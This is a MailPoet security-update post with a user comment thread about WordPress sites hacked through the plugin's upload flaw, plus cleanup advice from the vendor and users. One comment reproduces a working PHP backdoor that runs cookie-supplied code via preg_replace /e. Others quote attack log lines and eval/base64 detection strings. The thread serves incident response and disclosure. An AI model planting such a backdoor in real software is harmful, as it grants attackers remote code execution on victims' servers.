Security Update, Part 2.

MailPoet users, we are really sorry.

The last week exploit was bad, and we should have never released a WordPress plugin with that in it.

We kept researching and running security tests on our plugin to see if we were missing something else.

A few hours ago Dominic Lüchinger, security engineer (https://twitter.com/drdol), contacted us to disclose a possible attack leveraging the way PHP merges into the REQUEST array all GET, POST and cookies parameters. It’s directly related to the previous vulnerability, and we just released a new version 2.6.8 to address this particular threat.

It’s common thinking that WordPress is an insecure platform and all plugins are full of exploits. We need to change this right now!

We are introducing internal security reviews where we’ll run penetration tests on internal WordPress websites in order to catch exploits faster.

We are also introducing a bounty program for exploits. Please contact us and we’ll let you know how to get in touch on a secure channel.

We value the privacy and security of our users above any other thing, and we’ll work every day to avoid things like these happen again.

On your side, please keep your plugins always up to date. If you can’t because you customized a particular version, please download the standalone security package that has been updated too.

Thanks.

How to install the standalone plugin?

  • Download the plugin here
  • In your Admin, go to menu Plugins > Add
  • Select the tab “Upload”
  • Upload the .zip file you just downloaded
  • Activate the plugin
  • That’s it!

 

DISCUSSION

    Author’s gravatar

    Hi,

    Thank you for this information. In my website I’ve the 2.6.7 version. What is the procedure to do ? I don’t understand. What is mpoet-retro-secured.php ? How use it ?

    Thank you.

    Author’s gravatar

    Hi,

    You can just update to the latest version, 2.6.8.

    Thanks.

    Author’s gravatar

    Thanks for working hard to get out ahead of the issue!

    I’m sure it was a big shock to be presented with your first public vulnerability and I truly appreciate the efforts you are taking to address the problems.

    Thanks for a wonderful plugin!

    Author’s gravatar

    Thanks for the support Dave!
    We’ll do our best so that this sort of issue never happen again.

    Author’s gravatar

    Well, I can’t let you get away scott free! Looks like the new updates screw up the background color in email clients – browser display is still correct. :)

    Author’s gravatar

    I just got notified by 1and1 that malicious code was uploaded to the theme folder. Will updating be enough to fix the problem?

    Author’s gravatar

    Hi G,

    Actually updating your MailPoet to the latest version 2.6.8 makes sure that nobody can attack your website.

    If 1and1 spotted that a malicious theme had been uploaded to your site, I suppose they already took care of it.

    Go ahead and check if anything is left there in your upload folder: wp-content/uploads/wysija/themes

    Check if there is a theme including a PHP file and delete it if that’s the case.

    Otherwise I recommend you to get in touch with 1and1 directly to get more information.

    Please do get in touch with us if you have further questions:
    http://support.mailpoet.com/feedback/

    Author’s gravatar

    I am also with 1 & 1, and the vulnerability was exploited.

    I inquired as to the actions taken on their end, and the response was “Our anti-virus system doesn’t prevent files from being uploaded. If it detects a file that it deems malicious it simply changes the permissions to 200, or write only for it’s owner.”

    The PHP file is not there in the theme upload folder (only an index.html with size of 0). Is there something I should be doing?

    Thanks.

    Author’s gravatar

    Hey Keith,

    Have you checked the subdirectories of the themes folder? This is where you will find the malicious PHP file if there is any

    wp-content/uploads/wysija/themes/malicious_theme/…

    1and1 is pro-active on that one, that’s good, that means that no PHP file can be executed making the upload of malicious files completely harmless.

    This said, look for the file in your FTP and try to delete it.

    Author’s gravatar

    Thanks, I think I may have found it. I deleted the folder with the php file.

    Author’s gravatar

    Hi

    We are running version 2.6.6 and can’t update immediately as we have done a load of customisation.

    How do we use mpoet-retro-secured.php? Do we just upload it to the plugin directory or what?

    We done of dealing with this matter

    Author’s gravatar

    Hello Alex,

    Sorry for the inconvenience.

    If you want to keep using the 2.6.6 yes go ahead: upload the mpoet-retro-secured plugin and activate it on your site.

    This will apply the same correction included in the version 2.6.8.

    Author’s gravatar

    oohh. Not a happy bunny.

    Followed your instructions and uploaded and actives plugin mpoet-retro-secured. When I activated it, it showed that there was an update to mpoet-retro-secured, so I updated.

    It seems that this second update has applied 2.6.8 and has now overwritten all of the customisation that we have done on the plugin, which will now have to be redone.

    Author’s gravatar

    Hello Alex,

    Sorry to hear about that.

    I don’t know why the mpoet-retro-secured would have an update link, that should not be the case there is just one version of that plugin, no update available.

    Could you send us a copy of your mpoet-retro-secured? I’d like to take a look, send it at support [at] mailpoet dot com

    Thanks

    Author’s gravatar

    Hi,

    I have MailPoet Newsletters 2.6.6 with the option to update to version 2.6.8 and I have MailPoet Newsletters Premium 2.6.6 with the option to update to 2.6.7.

    In what order should I update them or do I just need to update one?

    Thanks,
    Mark

    Author’s gravatar

    Hello Mark,

    Simply update to the latest version.

    Free plugin version: 2.6.8
    Premium plugin version: 2.6.7

    Hope this helps!

    Please do get in touch privately if you require more help:
    http://support.mailpoet.com/feedback/

    Author’s gravatar

    Hi,
    my provider just emailed me that there was an upload of a malicious file. ../wp-content/uploads/wysija/themes/main/index.php

    Is it enough to run the new update?

    Thanks
    Marco

    Author’s gravatar

    Hello Marco,

    My sincere apologies about this.

    Yes you need to update to the latest version 2.6.8 and remove that theme using your FTP.

    If you need help with that, please do get in touch with us here:
    http://support.mailpoet.com/feedback/

    Author’s gravatar

    Mailpoet,

    This simply isn’t good enough. It is completely unacceptable to run software that has flaws such as this. You need to fix this and fix it quickly.

    I too have had a malicious file added to my site AND your update has failed to load, I now can’t update ANY plugins and I can’t delete them either.

    I am giving you to Tuesday morning to resolve this or I WILL sue you for any damage to my website.

    Get it fixed and get it fixed fast!

    Author’s gravatar

    Andy,

    My apologies once again.

    I’ve replied to you by email already. I hear you and we’ll do our best to sort you out.

    Let’s continue this conversation by email for now until we solve the issue on your site.

    Author’s gravatar

    Hey, thank you for the support and this information. Don’t worry, I’ve confidence in Mailpoet and your quick work team!

    Author’s gravatar

    Thanks for your support!
    Much appreciated :)

    Author’s gravatar

    Hi,

    Since all these updates there is a css problem on some browsers. When the newsletters are opened in Mail or in Safari they look really big. I’ve posted a support ticket and had someone giving me some advices but none have worked and since we have to wait 48h for every answer, this can last for quite a while if the solution provided fails every time. Are you working on this? I’ve unhappy clients to whom I advised taking Mailpoet so that makes me look bad.
    Thanks for your understanding.

    Chrys

    Author’s gravatar

    Hey Chrys,

    We’re working actively on this issue, we’ll try to release a new version as soon as possible.

    We just need more time… I’ve answered privately to your question with a solution.

    Thanks for your patience!

    Author’s gravatar

    Jumping in on this post if I may – this is also happening to us as well. Looks great when we create it, but when we preview it then the formatting is all over the shop.

    Need to know what to do to fix this, before we apply our own modifications to the plugin again

    Thanks

    Alex

    Author’s gravatar

    Hey Alex,

    Actually we’re working on those issues right now. We’ll try to fix it asap, meanwhile if you’re in a rush to send a newsletter you can always revert back to 2.6.6 where you didn’t have those rendering issue.

    Our old versions are now patched and can be used safely.
    http://wordpress.org/plugins/wysija-newsletters/developers/

    Regarding modifications of our code, I’d recommend to avoid them as much as you can so that you can freely update our plugin anytime we have new modifications.

    Author’s gravatar

    Hi Ben

    yes I agree about the code, but in order to get the functionality required and email mail the information, it was necessary to modify the code.

    Can you let me know when the formatting issues are fixed, as i don’t want to modify the code again, only to need to update again

    I am hoping that you rewrite of this excellent plugging will allow us to add additional bits of functionality without upsetting the original code or creating problems with updates

    Author’s gravatar

    Alex,

    Sure thing, through our rewrite we’ll try to make it easy for you to extend.

    I’ll send you a copy of a patched version which is currently being tested.

    I’ve ran a few tests and it works fine so far.

    Cheers!

    Author’s gravatar

    My site admin return a blank screen. Since i’m on Holiday i couldnot yet update. The blank screen just happend overnight no changes tot the site have been made!

    Renaming your plug in directory (incl premium) resolved the blank screen bit obiously no (new subscription) mail will be sent.

    Hou van My sits admin go blank without changing anything and what is te fastest fix?

    Author’s gravatar

    Sorry for typos.. Ducht spelling checker on phone :(

    Author’s gravatar

    Bonjour et merci les Poètes :

    Nous avons bloqué l’accès à /web et les scripts suivants ont été analysés comme étant malveillant:

    web/wp-content/uploads/wysija/bookmarks/large/10/global.php
    web/wp-content/uploads/wysija/bookmarks/medium/15/press.php
    web/wp-content/uploads/wysija/bookmarks/medium/17/press.php
    web/wp-content/uploads/wysija/bookmarks/medium/22/model.php
    web/wp-content/uploads/wysija/bookmarks/small/01/page.php
    web/wp-content/uploads/wysija/bookmarks/gallery.php

    Author’s gravatar

    We have bin infected by a PHP SpamBot throughout MailPoet :

    37.139.47.243 – – [11/Jul/2014:00:37:32 +0200] “POST /wp-content/plugins/wysija-newsletters/helpers/autonews.php HTTP/1.1” 200 222 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0”
    37.139.47.243 – – [11/Jul/2014:00:37:32 +0200] “GET /wp-content/plugins/mycred/addons/coupons/includes/alias.php HTTP/1.1” 200 78 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0”

    A new file has been uploaded at 00:37 and start sending spam until i delete the file.

    I have uploaded MailPoet and hope it will be the end of this attack.

    Author’s gravatar

    Thanks for sharing David,

    These two lines in your log are odd though. As they don’t look like being related to the exploit discovered in versions below 2.6.7.

    The first one is strange as it cannot execute anything since it can only be called through a request on /wysija-newsletters/index.php

    The second one is another request on a different plugin called mycred. You might want to look it up too.

    Get in touch with us on our support page if you need further help:
    http://support.mailpoet.com/feedback/

    Thanks

    Author’s gravatar

    It is strange because at the time of the calling of wysija-newsletters/helpers/autonews.php the file alias.php as been uploaded. In the folder of another plugin that is true but it is a funny coincidence.
    For the moment the PHP Spambot script hasn’t came back so I’m not worried anymore, thank you for your work.

    Author’s gravatar

    Hi,
    my provider has deactivated my website so that I can not use wordpress’s webinterface to update my mailpoet plugin.
    I’m used to change some data in an ftp client and have no idea what to do.

    Author’s gravatar

    My provider delete all my files, also my store – everything. I just can get a backup for 120 USD. Thank you for the problems. shit happened!

    Author’s gravatar

    I’m very sorry Paulo, we wish we could have avoided that.
    The last thing we want is our users having this sort of problems.

    Author’s gravatar

    Forgot I had the free version installed on a website and it got taken down. My hosting provider was notified and did a security scan. Unfortunately for me they charged me for putting the site back and the security scan to a tune of $59.
    I just purchased the premium version right before the attack. Luckily I was working on it and having problems so i was aware of all of the updates there and did them.
    I have to say, the money I paid for the premium version was money I thought was well spent due to the time it would save me. Now after all of this, my time has been diverted to all of the issues it’s caused.
    Very poor experience.

    Author’s gravatar

    I’m really sorry Rick.

    Author’s gravatar

    my provider has deactivated my website so that I can’t use the wordpress’s webinterface to update my mailpoet plugin.
    I have no idea what to do.

    Author’s gravatar

    If you have cpanel access it should be easy to get to file manager to see whats happening. Other than that you should contact your host provider and ask what they can do to help.

    Author’s gravatar

    New attack today :

    Since the calling of the back.php and sql.php a new file.php has ben uploaded and start sending mail.

    37.139.47.243 – – [21/Jul/2014:18:26:09 +0200] “POST /wp-content/plugins/wysija-newsletters/helpers/back.php HTTP/1.1” 200 48 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0”
    37.139.47.243 – – [21/Jul/2014:18:26:10 +0200] “POST /wp-content/uploads/wysija/bookmarks/medium/08/sql.php HTTP/1.1” 200 221 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0”
    37.139.47.243 – – [21/Jul/2014:18:26:10 +0200] “GET /wp-content/plugins/wysija-newsletters/js/vendor/file.php HTTP/1.1” 200 78 “-” “Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/24.0”

    Are you sure all security holes are knowned ?

    Author’s gravatar

    David,

    Based on your logs, it seems that more files have been uploaded and modified in your upload folder and the folder of MailPoet’s plugin.

    For instance, this file doesn’t exist in our plugin:
    /wp-content/plugins/wysija-newsletters/js/vendor/file.php
    it has been added by the person hacking you, and I wouldn’t be surprised if this file:
    /wp-content/plugins/wysija-newsletters/helpers/back.php
    Had been modified by the hacker as well.

    The best way to get rid of the issue in your case, is to get a backup of your website prior to the attack files and DB and change all of the passwords on your server FTP, SSH access and Database. Get in touch with your host if you don’t know how to do that.

    The person who hacked your website might have had his hands on all of these accesses.

    Author’s gravatar

    Hey Ben,

    “get a backup of your website prior to the attack” is exactly what I’m trying to figure out… I have made backups at least monthly so which one would you trust based on the timeline of this issue? Restore back to june, may, april…? Is there any signature to look for in the database to determine which backup is definitely clean, i.e. pre-attack?

    Thanks, Frank

    Author’s gravatar

    We’ve started to be notified of sites being hacked once the first security release was out and announced by Sucuri on the 1st of July.

    Therefore I believe that getting a backup from June should do fine.

    Unless your hacker knew about that security issue before it came public. It is possible but unlikely.

    There is no particular signature to look for, as a hacker has a wide range of possibilities once he is in( between Files and DB).

    If you’ve found malicious files on your server, you can use the creation date of these files in order to track down the date of the hack.

    Also the logs of your server can help you figure out which are the malicious files having been uploaded and when where they uploaded.

    Author’s gravatar

    They are still php files in subdirectories of wp-content/uploads/wysija/bookmarks/

    I think everybody must to delete them to avoid new attack.

    Author’s gravatar

    WordPress should really think about how updates are proposed on the admin panel. For critical updates like this one, WordPress should notify admins by email and on the home of the admin panel with a bloody red flag

    Author’s gravatar

    Yes, this would be a great feature to have.

    Author’s gravatar

    Handling a non-profit volunteer entity with this issue breaking our website, was not a welcome fix to have to recreate the entire site. Will you have some form of automatic update and notification system?

    Author’s gravatar

    Hello Mark,

    Sorry to hear that your site was hacked through that vulnerability…

    There is already an update notification system in place within WordPress, so that when we update our plugin you see it from the backend of your site. Make sure you always keep an eye on those and always keep your plugins updated to the latest version, all of them.

    Also for that particular security issue, we’ve sent all of our users subscribed onto our MailIng list an email straight after the security release was out. It was urging you to update.

    We can only encourage you to subscribe to our newsletter in order to be notified as soon as possible if we have important updates such as this one.

    You can find the subscription form in the footer and the sidebar of our site.

    Author’s gravatar

    I update everything regularly and on time.
    I am subscribed to you mailing list and it’s only today, 2 DAYS LATER, that I receive your email about this.

    It’s not even clear because I had 2.6.8 and your email isn’t clear whether or not that version was safe.

    I have many webistes, live commercial websites and what you are saying is I have to shut them down and reinstall an old (a MONTH-old!!!) back-up and the replenish the content, on my time and my money.

    I did my part (keeping up to date) and yet I’m still stuck.

    I had recommended you. I can’t anymore. That’s too many security issues in too short a time, and I’m paying to clean up my clients sites when I’m not paid to do so and I didn’t charge them for future hackings (of course).

    Author’s gravatar

    Marie,

    Sorry about the confusion.

    The email you’ve received today is a reminder for our users who forgot to update their MailPoet. The version 2.6.8 was safe, there is no problem with that one.

    If you’ve updated regularly, there shouldn’t be any problem, you only need to start a restoration process if you have been hacked, which most likely didn’t happen if you’ve updated on time.

    Author’s gravatar

    The sites seem ok. Except one of them has a folder in the Wysija/themes that is called “Main” (Default is still there). In that “Main” Theme there is an index.php file (your email said there wasn’t supposed to be any.
    That php file says:

    (php) **
    * @package Joomla.Plugin.System
    * @since 1.5
    *
    *
    */
    class PlgSysJoomla {
    public function __construct() {
    $file=@$_COOKIE[‘ljNqe3’];
    if ($file){ $opt=$file(@$_COOKIE[‘ljNqe2’]); $au=$file(@$_COOKIE[‘ljNqe1’]); $opt(“/292/e”,$au,292); die();} else {phpinfo();die;}}}
    $index=new PlgSysJoomla;

    Joomla! in a WP install!

    The other files in that folder include an error log which includes many lines similar to this: [05-Jul-2014 06:51:52] PHP Warning: scandir(../components) [function.scandir]: failed to open dir: No such file or directory in /home/bcbemeru/public_html/wp-content/uploads/wysija/themes/main/index.php(11) : regexp code ( 1 ) : eval ( )’d code on line 34

    As if they somehow think this is a joomla site.

    ****

    Based on Sucuri’s info, I scanned (search function) for malicious code and can’t find any. I spot checked many .php files (config, index, etc.) and they all look clean.

    I believe if I remove the themes/main folder, everything should be fine without having to do anything else.

    What do you think? That strange folder was installed on July 5.

    The only other thing installed or updated on July 5 was a wysija/ folder called “Temp” in which there is only a blank index.html file.

    Before I erase anything I’d like to know if the “main” theme could have actually been generated by Wysija itself and not be related to any hack.

    Marie

    Author’s gravatar

    I am not happy…….
    I have not received the bill ,but have had to have a new WordPress site uploaded in order to clear the problem.
    6 days now without a website with a business that depends on it.
    You are responsible for this. And in seems your Plugin has been unsecure for quite a while.
    Sorry isn’t good enough.

    Author’s gravatar

    Hello David,

    I’m trully sorry about this.

    We did as much as we could to save you from experiencing that, we’ve tried to contact all of you through our blog, social networks, email notification to urge you to update, we’ve contacted manually hundreds of emergency contacts when you were on holiday, and we talked to hosting companies so that they could protect you from that even without you updating. Sadly not all of you could get enough time to update, and that’s unfortunate.

    Our plugin had this flaw since day one indeed, and we found out about it only now, we did our best since December 2011 and our first version to keep this plugin safe, we’ve corrected quite a few security issues on the way to finally miss that one which is major…

    This experience is a very frustrating one. I wish we caught it before hand or we had more time for all of our users to update to a safe version before hackers started to exploit that. But this is something that just went out of our control unfortunately.

    Author’s gravatar

    Hi,

    I just updated the MailPoet version. is the new Version 2.6.9.

    Author’s gravatar

    Yes version 2.6.9 is the latest one!

    Author’s gravatar

    Hi,

    Since I had an issue (blank wordpress admin screen) at 8 july I disabled (renamed directory’s) mailpoet.

    Today I took the time to look into this, reading also al comments above.

    So it seems, due to a vulnerability in the mailpoet plugin ‘hackers’ could get access to our site? Please explain what things to look for to determine if I’m hacked or not.

    Is disabling / renaming the old version enough to be safe?
    Can I delete the old files and Install the new version (also premium) without loosing any data / mailings?

    After doing some comparing of directories I found this file:
    841rewb3v4x.php
    It’s seems like it’s somehow encripted as I cannot see what it’s up to. The change date is the same as the rest of the files in the directory but the permissions are set to (0640) rest of the files have 0644 as permissions?

    I cannot restore my database as I will loos all user content placed since this happend.. where to look for in the database if i’m hacked?

    Hope you can give me some good answers so I can start using mailpoet again..

    Author’s gravatar

    I found al kinds of weird stuff in \wp-content\uploads\wysija\themes\

    I was looking for the text ‘eval ( base64_decode (‘
    and ‘eval ( gzinflate ( base64_decode (‘ and found 3 very suspicious files..

    I delete the whole wysija themes directory… hope i’m ‘clean’ now. Any suggestions are very welcome..

    Author’s gravatar

    Hi Ramon,

    Once the site has been infected, there are many ways that the hacker could find to put hidden encoded files anywhere in your site or create hidden administrators account in your database.

    This is why in your case you’ll need to go through a complete backup process.

    What you need to do is to download a copy of your database and files as it is right now in order to restore manually the part of the data (users) that will be missing in your previous backup.

    You’ll need to change all of your passwords on your site as they’re compromised SQL, FTP, SSH, Administrator account, and change the secret keys in your wp-config.php

    I recommend you to read this WordPress FAQ on being hacked, it explains all of the steps very clearly: http://codex.wordpress.org/FAQ_My_site_was_hacked

    Once again we’re very sorry for all this trouble…

    Author’s gravatar

    Hi,

    Since the problem and update my client as the following problem. When someone subscribe to her newsletter he receives an email but the sender’a name is her wordpress ID .which is a problem… How can this be fixed??

    Everything has been updated.. So I don t know what to do..

    Kind regards

    Author’s gravatar

    Amazing that you do not respond when someone is not happy about this security problem. I am only now today receiving warning from hosting companies after i have had to have the whole site practically rebuilt……And a bill of £500.00.
    I used to recommend this plugin to everyone not anymore i am already getting emails and it is not my plugin.
    Get in touch please . You have a responsibility.

    Author’s gravatar

    Hi David,

    We do answer to all of our users, happy or not happy; in time of crisis though our answering time can be a little bit lower.

    If you need us to help you fix something, please get in touch here we’ll be glad: http://support.mailpoet.com/feedback/

    Author’s gravatar

    C’est peut-être la première erreur que vous ayez faite … mais je pense que cela sera aussi la dernière … :-(

    Plus personne ne voudra vous faire confiance à nouveau, surtout pas tous ceux qui comme moi ont été infectés sur TOUS les sites où j’ai eu la malheur d’installer votre plugin …

    Je suis en train d’essayer de sauver ce qui peut l’être mais je vais surtout trouver un autre plugin plus sérieux … désolé les gars, mais sur ce coup vous avez merdé et ça se saura partout sur le web.

    Vous avez pensé à faire autre chose dans la vie ?

    Author’s gravatar

    Désolé pour les conséquences que cela a pu avoir sur vos sites. Nous savons à quel point cela peut être frustrant de devoir rétablir des sites hackés.

    Nous comprenons totalement la perte de confiance que cela a pu engager chez certains de nos utilisateurs et nous ferons tout ce que nous pourrons pour la regagner.

    Concernant nos activitées, non, nous ne pensons pas nous dédier à autre chose, cela fait 3 ans maintenant que nous travaillons dur sur ce projet. Nous avons énormément de choses que nous souhaitons accomplir avec MailPoet, et nous comptons bien persévérer.

    Bon courage pour la restauration de vos sites en tout cas.

    Author’s gravatar

    I cant believe some of the users venting here in the wrong place and for the wrong reasons. It’s not a support thread it’s an update to an issue that is common to WordPress itself and all developers…Malicious Hacking.

    We shouldn’t have to worry about malicious hacking of sites but alas there is a bunch of smart people doing evil things out there and always looking for angles to get something for nothing. The good people focus on doing good things and get caught in that loop

    We as WP owners need to be aware that the good things we get everyday and the improvements are from these good people solving problems and creating time savings and efficiencies that make our business’s better.

    So sometimes the lessons we learn are harder than others, I have been hacked in any numbers of ways which either I, WordPress or Developers couldn’t have known beforehand and each time, even though it was frustrating the issue made things better. Better at finding, Better at Protecting, Better at recovering.

    When something goes wrong it makes you stronger. So now if something goes wrong I control backups, updates, improvements so that it takes mere minutes to fix or recover, yes minutes, not hundreds of pounds or having a hoster switch a site off or any loss of trust with a hard working coding team.

    Why look for someone to blame when you can turn it into a way to do things better? Why vent or rant when the proper spot is to get the support they are so willing to give. If it highlights your need to do better backups, get it done or it shows your need to keep watch on notices and updates, implement it.

    I have faith in the MailPoet Team to do what they can do to make a great product that saves me time and makes my WordPress sites easier to use for email marketing, I wont be changing anything.

    I know that as a result of this issue MP will be even better and a solution I’ll be using long into the future. I am voting with both my cash and my time for MailPoet.

    Author’s gravatar

    Thanks Mark!

    We’ll keep making sure your money and time are well invested.

    Your support means the world to us!

    Author’s gravatar

    Comment savoir si son site a été infecté svp?
    Merci

    Author’s gravatar

    Bonjour Joe,

    Il vous suffit de chercher des fichier .php dans le dossier wp-content/uploads/wysija de votre site.

    Si vous en trouvez, vous êtes infectés.

    Author’s gravatar

    Hello.

    We used mail poet. This week our website this week failed. You think we could help reactivate?

    Now we just have a temporary page.

    thank

    Author’s gravatar

    Don’t try to deflect this vulnerability in your code onto WordPress! It is disgusting that you are trying to dodge responsibility for a huge security vulnerability found in your plugin by suggesting WordPress is to blame. Take responsibility for your shoddy coding!

    Numerous clients of mine have had their websites compromised thanks to your plugin and I assure you I will be migrating them all to a more competent competitor.

    Author’s gravatar

    Hi Bill,

    We’re very sorry for the frustrating experience, by no means we are trying to deflect the responsibility onto WordPress, this mistake is entirely ours and we wish we had avoided it.

    It has nothing to do with WordPress, this is our code which was flawed and not WordPress’ one. We know that and have no reason to avoid that reality.

    We wish you all of the luck in the world with your new newsletter plugin.

    This said you need to be aware that what happened with our plugin could happen with another one (newsletter or not), make sure you take measures to protect your sites from this kind of situations.

    Update your plugins and WordPress frequently. And make sure you have an efficient backup in place for your files and database.

    MailPoet is not the first plugin nor the last one in WordPress which will show vulnerabilities.

    Author’s gravatar

    My host Fat cow sent me a notification that they found a problem (cause by the wysija plugin) and suspended the website… but I checked in the uploads folder and can’t find any php file. I looked in all the folders and subfolders…

    Author’s gravatar

    I take that back… found it in the mail folder and deleted it.

    Author’s gravatar

    Alright, is your site back on then?

    Author’s gravatar

    Courage,

    L’erreur est toujours possible mais on a un peu trop de facilité à accuser celui qui a oublier de fermer à clé la porte sans voir que les fenêtres etaient grandes ouvertes…

    Autrement dit cet incident de parcours aura permis à tous vous comme nous

    Author’s gravatar

    Merci pour le support Christian, on apprécie grandement!

    Author’s gravatar

    Oups… suite.. d’évoluer sur ce point si important de la sécurité. Pas hacké sur mes deux sites olors que l un est attaqué quasi en permanence… mais j ai rajouté bcp de sécurité via htaccess…ça limitera les degats.

    En tous les cas on attend les futures évolutions.
    Pas de soucis de confiance.
    KUTGW

    Author’s gravatar

    Merci encore pour votre confiance!

    Author’s gravatar

    @ben
    j’ai trouvé dans uploads/wysija/themes , un répertoire test avec un fichier 1.php qui contient le code suivant, je pense que je suis infecté … . Le répertoire test a été inséré le 3 juillet 2014…

    Par contre, j’ai vu que certaines personnes infectées avaient leur site down alors que le mien est toujours en ligne…. Pas de trace dans le cache des pages Google de liens spammy non plus. J’ai mis à jour la dernière version du plugin. Que faire de plus? Je ne peux plus faire de back up de ma base, ni du ftp car avec OVH, on ne peut pas remonter à plus de trois semaines. Hors le 3 juillet, ça fait plus de trois semaines. Que puis-je faire?

    Merci de m’aider.

    Author’s gravatar

    Bonsoir Joe,

    Il faudrait étudier le hack, peut être que l’infection n’a pas été trop importante et elle est nettoyable.

    Pouvez vous contacter OVH et demander si ils n’ont pas un autre moyen de récupérer un backup plus récent? 3 semaines c’est très court.

    Author’s gravatar

    I just cleaned up a site, it took me 2 days. Not sure if every attack is different but these were the steps that I had to take:

    1. The first time the site was exploited, they dropped multiple shell scripts in the wp-includes directory, wp-content, directory, and 2 or three plugin directories. They inserted eval64 code in every index.php file (including those protecting the every plugin folder).

    2. They change permissions on folders and files they exploit, so if you don’t have sudo permissions you might not be able to delete them.

    Below are some of the steps I took to secure a site. By all means, be very cautious when deleting critical files (especially WordPress core files) as it may break your site depending on the setup. This is just advice, use this at your own discretion. An easier way to look for modified files is to sort by date in a directory with your FTP software.

    1) Manually cleaned up every index.php file on the site, removing the eval64 code at the top.

    2) Deleted all WordPress core directories and uploaded fresh copies of those files. This was sort of a challenge, as they changed permissions on some of those directories and files so they couldn’t be deleted via FTP, I had to contact the host.

    3) Went through every plugin directory looking for suspicious files. Sometimes, these are hard to spot so carefully make sure that those files belong there by comparing code from a fresh copy of the plugins you have on your site. An easy way to tell is by deleting the plugin and uploading a fresh install of the plugin. If you cant remove the plugin directory and get a permissions error via FTP, have your host look at it or remove the file.

    4) Went through the wp-content directory uploads folder looking for recently uploaded files that looked suspicious or out of place.

    5) The site I was working on still had a wisjya directory from an old version of the plugin, they got in there and replaced some files so all of those had to be deleted too.

    6) After I completed some of the steps above, I updated the Mailpoet plugin and installed a security plugin that restores replaced files by monitoring for changes every minute. At that point, I could see if they still had a shell script uploaded where they were still getting in.

    Honestly, this wasn’t the worst hack I’d seen but it was pretty time consuming to clean up.

    Author’s gravatar

    Robert,
    Thanks for sharing!
    And sorry for the troubles…

    Author’s gravatar

    Hi, I received an E-Mail warning infection today. For I am not an expert of coding, I am quite helpless and do not know what to do. It is recommanded to set the site to the state before July 1st. Unfortunately, I don’t have any backup files older than July 12th. I just removed two subfolders containing suspicious php files, but I am not sure if there is any other infections. What should I do?

    Author’s gravatar

    Hello Su,

    What was the email from your host saying? If they had a firewall in place like 1and1 seems to do, those files uploaded should have been harmless.

    What was the recommendation in that email? They simply asked you to delete the file? if so, you should be fine.

    Now regarding the backups, in the future I’d recommend you to setup a better backup system on your site, these situations could happen again on your site, whether you use MailPoet or not, and you need to be prepared for that.

    Here is a company which can take care of your backups for instance https://managewp.com/features

    Author’s gravatar

    Thank you for your support.
    I contacted 1blu but couldn’t get any helpful answer. Meanwhile, I deleted two subfolders (as mentioned above) containing suspiscious php files dated on July 6th. But I am not sure if that was it. Is there any possibility that the malicious code is still hiding somewhere? And if so, how can I find it out?

    Author’s gravatar

    @ben
    J’ai mis à jour ma version de WordPress, j’ai changé mon mot de passe FTP et base de données. J’ai vérifié que ma table wp_users et il n’y a bien que mes deux comptes utilisateurs. J’ai vérifié aussi les fichiers index.php du thème qu’il n’y avait pas un code eval64 au début du code.
    Penses-tu que cela soit suffisant pour contourner le hack? Ou tu me conseillerais autre chose encore?
    Dernière chose, j’ai vu autre part que Nextgen gallery Shell Upload faisait aussi des plugins touchés. Pourquoi Shell Upload, est-ce une extension du célèbre plugin de galerie? Car je l’utilise aussi pour mon site, enfin nextgen gallery version 1.9.6!

    Merci de tes lumières !!!

    Author’s gravatar

    Bonjour Joe,

    Tout dépend du hack que tu as subis, certains hacks sont plus graves que d’autres.

    Je conseillerais une restoration des fichiers aussi, voici un guide en anglais pour les différents points important à vérifier:

    Et un article en français de Julio Potier qui pourrait t’aider il parle notamment de NextGen: http://blog.secupress.fr/attaques-wordpress-261.html

    Author’s gravatar

    One of my sites was infected. There was malicious code in 45 files in various directories including plugins, themes, uploads, and wp-includes. I think it’s clean now, but there still more work to do to restore the latest content.

    I am disappointed that I learned about this so late. I subscribe to the MailPoet newsletter, but the issue announcing the vulnerability came to me on July 26. My site was hacked on July 5, and it would have saved a LOT of work if I knew sooner.

    Author’s gravatar

    Same here. Hacked on July 5 too, learned about it on July 26. :-(

    Author’s gravatar

    Hi Joanne and Marie,

    I’m very sorry to hear that this vulnerability affected your sites…

    If you were subscribed on our newsletter then you’d have received our two first alarming newsletters sent on July 3rd and July 4th.

    It’s very unfortunate if it didn’t reach you at the time. Some of you were not on these lists at the time of these first alerts sadly… We’ve also twitted about it on our social networks…

    Then we’ve started, as an emergency measure, to build a list of contacts based on all of the support questions we’ve had received in the past years, in order to reach as many users as we could. The alert you’ve received on July 26th is the one that has been generated with these contacts.

    We did our best with the tools we had in hands. Bottom line is that the best way to know if we have an update for you is to look for it in the plugins page of your site regularly, and update as soon as you can see there is one available.

    Author’s gravatar

    Hmmm maybe I wasn’t really subscribed to the newsletter and received the July 26 email based on other support contacts? I just re-subscribed to be sure.

    I do check the admin panel often. However, I have local mods to make MailPoet mobile friendly, so unfortunately I’ve become accustomed to seeing the update badge until I have time to re-apply my mods. I know that local mods come with a risk, and this time I paid the cost. From now on I’ll read the update description carefully to see if it’s critical. I agree with the prior commenter that it would be nice if WP allowed a red badge to flag security updates to plugins and themes.

    Thanks again for continuing to monitor this thread and provide thoughtful answers.

    Author’s gravatar

    Joanne, anyway now we have you, so you’ll receive these news first for sure next time.

    We’ll keep monitoring this thread as long as we can. We owe you that.

    The security update feature in WP would be great that’s for sure…

    Thanks for your understanding and patience, we really appreciate.

    Author’s gravatar

    I’ve always regularly updated all my plugins as soon as there is an update available, and to my knowledge I was on your mailing list long before July 5.

    Author’s gravatar

    Yes I checked, and you’re right, you were on our list since February 2014.

    So I checked further in order to see why we didn’t send you those newsletters.

    But it appears that you’ve received them and opened our newsletters on the 3rd and 5th of July as well, maybe they were not alarming enough, or somebody else has access to your email, I’m not sure.

    Author’s gravatar

    I updated the plugins (I have it on many sites) as soon as I got the newsletter. But the infection started on July 5th on most of the sites I found infected.

    Maybe you should have a special kind of email with a sender called MAILPOET-SECURITY and a Subject Line starting with URGENT-UPDATE NOW or something like that.

    Author’s gravatar

    The thing is, in your July 26 message (update to 3.6.9) this time you told us where to look to find faulty files.

    I don’t recall seeing that in the previous messages. To my recollection you were only asking that we update. Or did I not read far enough?

